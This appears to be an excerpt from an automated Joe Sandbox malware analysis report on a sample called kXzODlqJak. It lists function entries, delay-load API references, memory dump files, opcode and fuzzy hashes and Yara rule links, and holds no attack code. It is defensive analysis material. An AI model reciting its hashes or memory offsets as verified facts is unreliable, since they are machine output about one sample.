                                                                                                                                                                  • Instruction ID: 85882fb245dad7de0a559ec6c8238a4dea33857691d4f324b6c26b46ecae9d87
                                                                                                                                                                  • Opcode Fuzzy Hash: febdfad0601dcec197a4beb5d8cad55dc2ee9715b3578581c8b442263b24910e
                                                                                                                                                                  • Instruction Fuzzy Hash: B4B012C335D102AF311451059C42E36015CC2C2F15371E42FB808C1042D4894C440177
                                                                                                                                                                  Function 0097C2C6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 385c83007c3b0049de9eb5f057bad80239a2bcee999eeb11ea032eee83b68577
                                                                                                                                                                  • Instruction ID: 1ef62c60371baada408396e07430a5f1ed173c26ffdebb6f28c6317d1a8e1fe4
                                                                                                                                                                  • Opcode Fuzzy Hash: 385c83007c3b0049de9eb5f057bad80239a2bcee999eeb11ea032eee83b68577
                                                                                                                                                                  • Instruction Fuzzy Hash: D2B012C735C202AF321451059D06E37014CD2C2F15370E52FF408C0082D4894C840177
                                                                                                                                                                  Function 0097C212 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 4c641641aad174c45aa51f17bf9071dfeefb9b19ce4a5e4ee0631523ff9ad138
                                                                                                                                                                  • Instruction ID: 7cff7d77e8a2d8e1606be64d28c9f540cc15e0c909fb71bf6427bdef7238489b
                                                                                                                                                                  • Opcode Fuzzy Hash: 4c641641aad174c45aa51f17bf9071dfeefb9b19ce4a5e4ee0631523ff9ad138
                                                                                                                                                                  • Instruction Fuzzy Hash: DDB012C735C102AF311451059E06E36014CD2C2F15370E42FB408C0082E48A4D410177
                                                                                                                                                                  Function 0097C202 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: ced46cb21a788d710607bd50126f6394ac755d7716d69a3d6c4a9f441798be70
                                                                                                                                                                  • Instruction ID: 79a7fccd4c7f20f08c22ad81faae3fbd5a1211f3531d792c6f391bd9db9f3671
                                                                                                                                                                  • Opcode Fuzzy Hash: ced46cb21a788d710607bd50126f6394ac755d7716d69a3d6c4a9f441798be70
                                                                                                                                                                  • Instruction Fuzzy Hash: 10B012C335C102AF311451059C42E36014CC6C2F15372E42FB808C1042D4894C400177
                                                                                                                                                                  Function 0097C236 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 2676eafa6fc62e824bf4e310a0afa1e89246b6c79cae9ab60cca6abbab68f32e
                                                                                                                                                                  • Instruction ID: d740742aea37421b2c65e2cf530d3aa1a82c7e27cde8be36be7f3058c5deb80c
                                                                                                                                                                  • Opcode Fuzzy Hash: 2676eafa6fc62e824bf4e310a0afa1e89246b6c79cae9ab60cca6abbab68f32e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8EB012C735C102EF311451059D06F36014CE2C2F15370E82FB408C0082D4894C400177
                                                                                                                                                                  Function 0097C222 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 1f1afc9b72f94dec31fc49c31f3365d79122a13bcc44aaea127599aefe63e3ac
                                                                                                                                                                  • Instruction ID: 33c4a6648ec2a1a8749a2e0629d191f6e81e0d6b5a73741b88411c0cb9f39789
                                                                                                                                                                  • Opcode Fuzzy Hash: 1f1afc9b72f94dec31fc49c31f3365d79122a13bcc44aaea127599aefe63e3ac
                                                                                                                                                                  • Instruction Fuzzy Hash: B6B012C335C1026F311491059C02F37014CD2C2F15370E82FB408C1082D4894C404177
                                                                                                                                                                  Function 0097C256 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 9c12cc7678b2a4fe7547d3a856483af39554879139e2ab463fb24e6f686ff45b
                                                                                                                                                                  • Instruction ID: b6c5ef4f0f6b51378e3d8438652d5a38307ea8bb39000d2dcec0064e5471a887
                                                                                                                                                                  • Opcode Fuzzy Hash: 9c12cc7678b2a4fe7547d3a856483af39554879139e2ab463fb24e6f686ff45b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7CB012C335D1026F311451059C02F36014CD2C2F15370E82FF408C0042D4894C400277
                                                                                                                                                                  Function 0097C246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 42cd0d813035fd71b30e3b4fb05e0dd66dd89808048de6e358c847d437299749
                                                                                                                                                                  • Instruction ID: c4ab7b824240579041ed4ab1f64605cb10eb483b9a68d7623e1f890fac24f1fd
                                                                                                                                                                  • Opcode Fuzzy Hash: 42cd0d813035fd71b30e3b4fb05e0dd66dd89808048de6e358c847d437299749
                                                                                                                                                                  • Instruction Fuzzy Hash: 88B012C335D2026F321451059C02E37014CC2C2F153B0E52FB408C0042D4894C840177
                                                                                                                                                                  Function 0097C276 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: f1366c2e48966173799297646f2970c55ecd145cf6729085468920d626023b9e
                                                                                                                                                                  • Instruction ID: de23fdb5b79e7d718f0b9fd7e5fa9897bc13c02e592d4d73bb7ec7afe19ed563
                                                                                                                                                                  • Opcode Fuzzy Hash: f1366c2e48966173799297646f2970c55ecd145cf6729085468920d626023b9e
                                                                                                                                                                  • Instruction Fuzzy Hash: A3B012C735C1026F311451059D02E36014CCAC2F15370E42FB408C1043D48A4C410177
                                                                                                                                                                  Function 0097C266 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 712a4077bca2b252b48397692485b50cc404dab79235b1e3ae5bc3182a4c7dad
                                                                                                                                                                  • Instruction ID: e1d994922b9da8094f1292f98ace4085b0c02c1531462e287ae0f961fc63b6ec
                                                                                                                                                                  • Opcode Fuzzy Hash: 712a4077bca2b252b48397692485b50cc404dab79235b1e3ae5bc3182a4c7dad
                                                                                                                                                                  • Instruction Fuzzy Hash: 86B012C335C2026F321451059C06E37014CC6C2F15370E52FB408C1042D4894C840177
                                                                                                                                                                  Function 0097C331 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C343
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: deae49989811cebe3ab504290a32e9127ef2d0b264f1196fb0997a0959f5e8ea
                                                                                                                                                                  • Instruction ID: af6f22f1d039929f13caff729991da3ee99398abaab48f92b3edb82e0e51631e
                                                                                                                                                                  • Opcode Fuzzy Hash: deae49989811cebe3ab504290a32e9127ef2d0b264f1196fb0997a0959f5e8ea
                                                                                                                                                                  • Instruction Fuzzy Hash: E3B012D325C103BF314412049D02C3601CCC2D1F14370E81FB504C4040D8845C050073
                                                                                                                                                                  Function 0097C40C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C424
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 8ad0f80d2d9431e0e490ba4fc6d62258086f6cd8cb7feef1e2892eb5e2223dea
                                                                                                                                                                  • Instruction ID: 517b46151ebab92b4236a816c72fa6657160bd9d92a52af7d5856320d2da29fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 8ad0f80d2d9431e0e490ba4fc6d62258086f6cd8cb7feef1e2892eb5e2223dea
                                                                                                                                                                  • Instruction Fuzzy Hash: 69B012C325C102FF321421609C42C37028CC2C1F20331E42FB404C4042D9845C000073
                                                                                                                                                                  Function 0097C43D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C424
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 6eed5beade134b65f7eb1280f05831a6d6db20b4d0558247514646be2ce05ba7
                                                                                                                                                                  • Instruction ID: 11f6846ef3bb0071a923b32b2ba0db2dfe37b1e04a3a2bfce5a2b68001b462c9
                                                                                                                                                                  • Opcode Fuzzy Hash: 6eed5beade134b65f7eb1280f05831a6d6db20b4d0558247514646be2ce05ba7
                                                                                                                                                                  • Instruction Fuzzy Hash: A9B012C325E103BF321451549D02D36024CC2C5FA0331E42FF008C8040D8844C010073
                                                                                                                                                                  Function 0097C42D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C424
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: f35dd0bbcc53f5e5190dd5de984288b39f79de5455c13f80991f2615c6d0197a
                                                                                                                                                                  • Instruction ID: ebf6cd2fe4920e9754511d3c30b5f456fce640ee8e8a484560151c712971d918
                                                                                                                                                                  • Opcode Fuzzy Hash: f35dd0bbcc53f5e5190dd5de984288b39f79de5455c13f80991f2615c6d0197a
                                                                                                                                                                  • Instruction Fuzzy Hash: B9B012C326E103BF321451549C12E36024CD6C5F60331E82FF008C4040D8844C000073
                                                                                                                                                                  Function 0096AC32 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNELBASE(FFFFFFFF,?,0096B428,00000000,00000000,?,00918106), ref: 0096AC55
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
